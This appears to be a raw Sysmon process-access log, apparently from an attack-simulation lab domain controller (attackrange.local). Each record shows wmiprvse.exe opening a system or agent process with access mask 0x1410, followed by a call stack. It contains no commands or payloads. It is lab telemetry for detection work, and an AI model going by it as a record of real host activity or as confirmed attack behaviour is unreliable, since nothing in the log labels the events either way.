14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204080Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8607-00000000AD01}4560C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204079Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204078Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F2-603E-7D07-00000000AD01}636C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204077Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F1-603E-7A07-00000000AD01}2736C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204076Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84BD-603E-DF00-00000000AD01}4964C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204075Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AF-603E-DC00-00000000AD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204074Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204073Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A3-603E-A900-00000000AD01}4912C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204072Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204071Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5B00-00000000AD01}3492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204070Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204069Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3400-00000000AD01}2960C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204068Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3300-00000000AD01}2668C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204067Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3100-00000000AD01}2400C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204066Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204065Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2F00-00000000AD01}2420C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204064Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204063Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2D00-00000000AD01}2308C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204062Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204061Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 